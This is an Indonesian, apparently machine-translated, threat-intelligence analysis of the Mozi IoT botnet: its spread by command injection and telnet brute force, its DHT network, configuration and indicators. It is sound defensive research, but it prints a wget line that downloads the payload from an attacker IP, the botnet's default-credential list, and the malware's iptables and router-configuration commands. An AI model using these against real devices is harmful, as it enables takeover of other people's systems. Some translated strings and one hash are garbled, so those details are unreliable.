Pemain yang relatif baru di arena ancaman, botnet Mozi, telah melonjak di antara perangkat Internet of Things (IoT), IBM®X-Force telah menemukan.
Malware ini telah aktif sejak akhir 2019 dan memiliki kode yang tumpang tindih dengan Mirai dan variannya. Mozi menyumbang hampir 90% dari lalu lintas jaringan IoT yang diamati dari Oktober 2019 hingga Juni 2020.
Pengambilalihan mengejutkan ini disertai dengan peningkatan besar dalam aktivitas botnet IoT secara keseluruhan, menunjukkan Mozi tidak menghapus pesaing dari pasar. Sebaliknya, itu membanjiri pasar, mengerdilkan aktivitas varian lain. Secara keseluruhan, gabungan contoh serangan IoT dari Oktober 2019, ketika serangan mulai meningkat secara signifikan, hingga Juni 2020 adalah 400% lebih tinggi daripada contoh serangan IoT gabungan selama dua tahun sebelumnya.
Lonjakan serangan IoT ini bisa disebabkan oleh sejumlah penyebab, tetapi sebagian mungkin disebabkan oleh lingkungan IoT yang terus berkembang untuk ditargetkan oleh aktor ancaman. Ada sekitar 31 miliar perangkat IoT yang diterapkan di seluruh dunia, dan tingkat penerapan IoT sekarang 127 perangkat per detik.
Penyerang telah memanfaatkan perangkat ini untuk beberapa waktu sekarang, terutama melalui botnet Mirai. Tim IBM® X-Force Incident Response and Intelligence Services (IRIS) telah mengikutinya selama hampir empat tahun. Jadi mengapa terjadi lonjakan tiba-tiba? Penelitian IBM® menunjukkan Mozi terus Lanjutkan sebagian besar melalui penggunaan serangan injeksi perintah (CMDi), yang sering kali Hasil dari kesalahan konfigurasi perangkat IoT. Pertumbuhan penggunaan IoT yang berkelanjutan dan protokol konfigurasi yang buruk adalah kemungkinan penyebab di balik lompatan ini. Peningkatan ini mungkin telah didorong lebih lanjut oleh jaringan perusahaan yang lebih sering diakses dari jarak jauh karena COVID 19.
Botnet IoT dapat digunakan untuk melakukan serangan denial-of-service terdistribusi (DDoS), mencuri data, dan mengirim spam. Ada sejumlah besar jenis perangkat IoT untuk mengeksploitasi:
Permukaan serangan besar ini membuat organisasi rentan terhadap botnet IoT. Ditambah lagi dengan celah keamanan yang sering kali dimiliki perangkat tersebut sejak awal dan praktik pengamanan yang longgar saat penerapan. Kerentanan yang paling menonjol dalam IoT datang melalui serangan CMDi.
Hampir semua penargetan IoT yang diamati IBM® mencoba menggunakan serangan CMDi untuk mendapatkan akses awal ke perangkat. Jika titik akhir yang ditargetkan adalah perangkat IoT dan rentan terhadap serangan ini, muatan diunduh dan dieksekusi.
Serangan CMDi sangat populer terhadap perangkat IoT karena beberapa alasan. Pertama, sistem tertanam IoT biasanya berisi antarmuka web dan antarmuka debugging yang tersisa dari pengembangan firmware yang dapat dieksploitasi. Kedua, modul PHP yang dibangun ke dalam antarmuka web IoT dapat dieksploitasi untuk memberikan kemampuan eksekusi jarak jauh kepada aktor jahat. Dan ketiga, antarmuka IoT sering dibiarkan rentan saat diterapkan karena administrator gagal mengeraskan antarmuka dengan membersihkan input yang diharapkan. Hal ini memungkinkan aktor ancaman untuk input perintah shell seperti “wget”.
Analisis kami mengungkapkan botnet Mozi memanfaatkan CMDi dengan menggunakan perintah shell “wget”, kemudian mengubah izin untuk memungkinkan aktor ancaman berinteraksi dengan sistem yang terpengaruh. Sebagai contoh:
wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a
Jika host rentan terhadap CMDi, perintah ini akan mengunduh dan mengeksekusi file bernama “mozi.a.” Analisis kami terhadap sampel khusus ini menunjukkan file dieksekusi pada mikroprosesor tanpa arsitektur tahapan pipa yang saling terkait (MIPS). Ini adalah ekstensi yang dipahami oleh mesin yang menjalankan arsitektur computer set instruksi berkurang (RISC), yang lazim pada banyak perangkat IoT. Setelah penyerang mendapatkan akses penuh ke perangkat melalui botnet, level firmware dapat diubah dan malware tambahan dapat ditanam di perangkat.
Meskipun contoh ini mengutip vektor yang terkenal, itu dapat terus efektif karena dua alasan utama. Pertama, kerentanan baru memungkinkan pembaruan terus-menerus dari upaya eksploitasi melalui CMDi, dan implementasi patch yang lambat dapat dieksploitasi. Kedua, aktivitas ini mudah diotomatisasi, memungkinkan aktor ancaman untuk menyerang sejumlah besar perangkat dengan cepat dengan biaya rendah.
Infrastruktur botnet Mozi tampaknya terutama bersumber di Tiongkok, menyumbang 84% dari infrastruktur yang diamati. Fakta ini sejalan dengan riset sumber terbuka lainnya tentang aktivitas IoT pada tahun 2020.
Di bawah ini adalah daftar kerentanan yang telah diamati IBM® oleh botnet Mozi yang mencoba untuk mengeksploitasi:
|Kerentanan
|Perangkat yang Terpengaruh
|CVE-2017-17215
|Huawei HG532
|CVE-2018-10561/CVE-2018-10562
|Router GPON
|CVE-2014-8361
|Perangkat yang menggunakan Realtek SDK
|Router Nirkabel Eir D1000 RCI
|Router Nirkabel Eir D1000
|CVE-2008-4873
|Sepal SPBOARD
|CVE-2016-6277
|Netgear R7000/R6400
|Netgear setup.cgi RCE tidak diautentikasi
|Netgear DGN1000
|Eksekusi Perintah MVPower DVR
|MVPower DVR TV-7104HE
|CVE-2015-2051
|Perangkat D-Link
|Eksekusi Perintah D-Link UPnP SOAP
|Perangkat D-Link
|Vendor CCTV-DVR RCE
|Beberapa Vendor CCTV-DVR
Botnet Mozi adalah botnet peer-to-peer (P2P) berdasarkan protokol sloppy hash table (DSHT) terdistribusi, yang dapat menyebar melalui eksploitasi perangkat IoT dan kata sandi telnet yang lemah.
Setelah dieksekusi, botnet Mozi mencoba mengikat port UDP lokal 14737. Sampel membaca /proc/net/tcp atau /proc/net/raw untuk menemukan dan membunuh proses yang menggunakan port 1536 dan 5888. Sampel memeriksa apakah file /usr/bin/python ada. Jika ada, sampel mengubah nama prosesnya menjadi sshd. Jika tidak, sampel mengubahnya menjadi dropbear.
Botnet Mozi diketahui memiliki setidaknya dua karakteristik unik. Ini menggunakan ECDSA384 (algoritma tanda tangan digital kurva eliptik 384) untuk memverifikasi integritasnya. Selain itu, ia menggunakan kembali bagian dari kode Gafgyt.
Ini berisi node publik DHT hardcode, yang dapat digunakan untuk bergabung dengan jaringan P2P. Node ini adalah:
dht[.]transmisibt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
Botnet Mozi berisi empat kemampuan utama. Ini dapat melakukan serangan DDoS (HTTP, TCP, UDP); melakukan serangan eksekusi perintah; mengunduh payload berbahaya dari URL tertentu dan menjalankannya; dan mengumpulkan informasi bot.
Tabel di bawah ini berisi detail tingkat tinggi tentang file yang dianalisis. Perinciannya mencakup file yang dikirim dan file sisa. (File sisa adalah file yang diekstraksi secara statis atau dinamis selama analisis malware.) Data termasuk nama file, kategori file yang ditentukan oleh analisis, hash file dan keturunan file dalam kaitannya dengan file lain dalam tabel.
|Nama File
|Kategori File
|File Hash
|Parent
|mozi.m
|Botnet
|4dde761681684d7edad4e5e1ffdb940b
|N/A
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|Botnet
|86d42d968d3d12c36722e16c78e49ffb
|mozi.m
|mozi.a
|Botnet
|9a111588a7db15b796421bd13a949cd4
|N/A
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|Botnet
|dd4b6f3216709e193ed9f06c37bcc3890
|mozi.a
Setelah dieksekusi, sampel mencoba mengikat port UDP lokal 14737. Sampel membaca /proc/net/tcp atau /proc/net/raw untuk menemukan dan membunuh proses yang menggunakan port 1536 dan 5888. Sampel memeriksa apakah file /usr/bin/python ada. Jika ada, sampel mengubah nama prosesnya menjadi sshd. Jika tidak, sampel mengubahnya menjadi dropbear:
Sampel juga mencoba memperbarui daftar kontrol akses untuk memblokir SSH dan telnet untuk mencegah botnet lain menggunakannya.
iptables -I INPUT -p tcp –destination-port 22 -j DROP iptables -I INPUT -p tcp –destination-port 23 -j DROP iptables -I INPUT -p tcp –destination-port 2323 -j DROP iptables -I OUTPUT -p tcp –source-port 22 -j DROP iptables -I OUTPUT -p tcp –source-port 23 -j DROP iptables -I OUTPUT -p tcp –source-port 2323 -j DROP
Ini juga secara acak memilih port hardcode di iptable:
Botnet Mozi menggunakan protokol DHT yang disesuaikan untuk mengembangkan jaringan P2P-nya. Proses bagaimana node Mozi baru bergabung dengan jaringan DHT adalah sebagai berikut:
dht[.]transmisibt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
Sampel perlu menghasilkan ID untuk node saat ini. Menurut laporan 360 Netlab tentang Mozi, “ID adalah 20 byte dan terdiri dari awalan 888888 yang disematkan dalam sampel atau awalan yang ditentukan oleh file konfigurasi [hp], ditambah string yang dihasilkan secara acak.” File konfigurasi ditunjukkan di bawah ini:.
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
Untuk bergabung dengan jaringan DHT, sampel mengirimkan kueri ping ke node publik DHT hardcode ini. Kueri ping dengan ID node ditampilkan dalam lalu lintas pada gambar Wireshark di bawah ini
Kedua sampel dikemas dengan menggunakan packer UPX yang disesuaikan. Proses ini menghapus nilai p_file_size dan p_blocksize menjadi nol dalam struktur p_info.
Sampel berisi file konfigurasi hardcode yang ditunjukkan di bawah ini:
File ini berisi empat bagian:
Data konfigurasi dikodekan menggunakan kunci XOR hardcode, 4E665A8F80C8AC238DAC4706D54F6F7E. Data konfigurasi yang didekodekan ditunjukkan di bawah ini:
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
Data konfigurasi mendukung beberapa perintah yang ditandai sebagai berikut:
|Tag (Perintah)
|Deskripsi
|[ss]
|Peran bot
|[ssx]
|mengaktifkan/menonaktifkan tag [ss]
|[cpu]
|Arsitektur CPU
|[cpux]
|mengaktifkan/menonaktifkan tag [cpu]
|[nd]
|node DHT baru
|[hp]
|Awalan hash node DHT
|[atk]
|Jenis serangan DDoS
|[ver]
|Nilai di bagian V di DHT protcol
|[sv]
|Perbarui konfigurasi
|[ud]
|Perbarui bot
|[dr]
|Unduh dan jalankan payload dari URL yang ditentukan
|[rn]
|Jalankan perintah yang ditentukan
|[dip]
|ip:port untuk mengunduh bot Mozi
|[idp]
|laporkan bot
|[count]
|URL yang digunakan untuk melaporkan bot
Botnet Mozi menggunakan kembali bagian dari kode Gafgyt dalam serangan DDoS. Ini mendukung beberapa jenis serangan DDoS seperti HTTP, TCP, dan UDP.
ECDSA384 signature 1 digunakan untuk memverifikasi nilai hash data konfigurasi. Kunci publik hardcode yang digunakan untuk memverifikasinya adalah:
4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 88
Ini dikodekan dengan kunci XOR 4E665A8F80C8AC238DAC4706D54F6F7E. Kunci publik yang didekodekan adalah:
02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 c6
Versi konfigurasi menentukan kapan harus memperbarui bot. Ini akan memperbarui bot ketika nilai ini lebih besar dari nilainya saat ini. ECDSA384 tanda tangan 2 digunakan untuk memverifikasi tiga bagian pertama dari file konfigurasi ini. Kunci publik hardcode yang digunakan untuk memverifikasinya adalah:
4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 A1
Ini dikodekan dengan kunci XOR 4E665A8F80C8AC238DAC4706D54F6F7E. Kunci publik yang didekodekan adalah:
02 D5 D5 E7 41 EE DC C8 10 6D 2F 48 0D 04 12 21 27 39 C7 45 0D 2A D1 40 72 01 D1 8B CD C4 16 65 76 57 C1 9d E9 BB 05 0D 3B CF 6E 70 79 60 F1 EA Ef
Selain kerentanan yang dieksploitasi botnet Mozi untuk mendapatkan akses ke perangkat korban, botnet Mozi juga dapat menggunakan kredensial telnet paksa menggunakan daftar kredensial hardcode:
root admin CUAdmin default rapport super telnetadmin !!Huawei keomeo support CMCCAdmin e8telnet e8ehome1 e8ehome user mother Administrator service supervisor guest admin1 administrator 666666 888888 ubnt tech xc3511 vizxv Pon521 e2008jl r@p8p0r+ GM8182 gpon Zte521 hg2x0 epicrouter conexant xJ4pCYeW v2mprt PhrQjGzk h@32LuyD gw1admin adminpass xmhdipc juantech @HuaweiHgw adminHW 2010vesta 2011vesta plumeria0077 cat1029 123456 54321 hi3518 password 12345 fucker pass admin1234 1111 smcadmin 1234 klv123 klv1234 zte jvbzd anko zlxx 7ujMko0vizxv 7ujMko0admin system ikwb dreambox realtek 00000000 1111111 meinsm
Satu kekuatan brute force login telnet yang digunakan oleh sampel sebagai berikut:
Mozi.m dan Mozi.a
Jaringan
dht[.]transmisibt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
String Terkenal (tidak dikemas)
8.8.8.8 /proc/net/route Mozilla/4.0 (Kompatibel; MSIE 8.0; Windows NT 5.2; Trident/6.0) Mozilla/4.0 (kompatibel; MSIE 10.0; Windows NT 6.1; Trident/5.0) Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00 Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 6.0; en) Opera 11.00 Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 6.0; ya) Opera 11.00 Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 6.1; de) Opera 11.01 Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/51.0.2704.79 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 seperti Mac OS X) AppleWebKit/600.1.4 (KHTML, seperti Gecko) Versi/8.0 Mobile/12H143 Safari/600.1.4 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/45.0.2454.101 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/46.0.2490.80 Safari/537.36 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, seperti Gecko) Versi/9.0 Safari/601.1.56 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, seperti Gecko) Versi/9.0.1 Safari/601.2.7 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) seperti tokek Mozilla/4.0 (kompatibel; MSIE 6.1; Windows XP) Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22/10.51 Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Versi/12.16 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, seperti Gecko) Versi/7.0.3 Safari/7046A194A Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/50.0.2661.94 Safari/537.36 Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 build/KTU84L) AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 Mozilla/4.0 (kompatibel; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00 Mozilla/4.0 (kompatibel; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30) Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 5.1; Trident/5.0) Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-AS) Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIeCrawler; Pusat Media PC 5.0) Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-AS) Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts) Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0 DAPATKAN KEPALA POSTING . /konfigurasi /tmp/config cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1” cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi” iptables -I INPUT -p tcp –destination-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 7547 -j DROP iptables -I OUTPUT -p tcp –source-port 7547 -j DROP [cpux] [/cpux] [cpu] [/cpu] [ssx] [/ssx] [ss] [/ss] none [sv] [/sv] [rn] [/rn] run: [nd] [/nd] /tmp /var /temp iptables -I INPUT -p udp –destination-port %d -j ACCEPT iptables -I OUTPUT -p udp –source-port %d -j ACCEPT iptables -I PREROUTING -t nat -p udp –destination-port %d -j ACCEPT iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT 0.0.0.0 [idp] This node doesn’t accept announces dht.transmissionbt.com:6881 router.bittorrent.com:6881 router.utorrent.com:6881 bttracker.debian.org:6881 212.129.33.59:6881 82.221.103.244:6881 130.239.18.159:6881 87.98.162.88:6881
Lingkungan botnet IoT terus bergeser, dan data IBM® menunjukkan aktor ancaman tetap aktif di ruang ini. Karena kelompok botnet baru, seperti Mozi, meningkatkan operasi dan aktivitas IoT secara keseluruhan melonjak, organisasi yang menggunakan perangkat IoT perlu menyadari ancaman yang berkembang. IBM® semakin melihat perangkat IoT perusahaan di bawah kecaman dari penyerang. Injeksi perintah tetap menjadi vektor infeksi utama yang dipilih oleh aktor ancaman, menegaskan kembali betapa pentingnya mengubah pengaturan default perangkat serta menggunakan pengujian penetrasi yang efektif untuk menemukan dan memperbaiki celah pertahanan.
Metadata Mozi.m
|Nama file:
|Mozi.m
|Ukuran File:
|108.808
|MD5:
|4dde761681684d7edad4e5e1ffdb940b
|SHA1:
|2327be693bc11a618c380d7d3abc2382d870d48b
|SHA256:
|d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
|Jenis File:
|ELF 32-bit MSB dapat dieksekusi, MIPS, MIPS-I versi 1 (SYSV), terhubung secara statis, dilucuti
|Kategori:
|Botnet
|Nama IRIS:
|Mozi
|Nama lain:
Metadata Mozi.a
|Nama file:
|Mozi.a
|Ukuran File:
|95.268
|MD5:
|9a111588a7db15b796421bd13a949cd4
|SHA1:
|034c8c51a58be11ca620ce3eb0d43d5a59275d2f
|SHA256:
|e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
|Jenis File:
|ELF 32-bit LSB dapat dieksekusi, ARM, versi 1, ditautkan secara statis, dilucuti
|Kategori:
|Botnet
|Nama IRIS:
|Mozi
|Nama lain:
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Metadata
|Nama file:
|d546_dibongkar
|Ukuran File:
|266.108
|MD5:
|86d42d968d3d12c36722e16c78e49ffb
|SHA1:
|ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
|SHA256:
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|Jenis File:
|ELF 32-bit MSB dapat dieksekusi, MIPS, MIPS-I versi 1 (SYSV), terhubung secara statis, dilucuti
|Kategori:
|Botnet
|Nama IRIS:
|Mozi
|Nama lain:
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d Metadata
|Nama file:
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|Ukuran File:
|212.464
|MD5:
|DD4B6F3216709E193ED9F06C37BCC389
|SHA1:
|758ba1ab22dd37f0f9d6fd09419bfef44f810345
|SHA256:
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|Jenis File:
|b'elf 32-bit LSB dapat dieksekusi, ARM, versi 1, ditautkan secara statis, dilucuti’
|Kategori:
|Botnet
|Nama IRIS:
|Mozi
|Nama lain: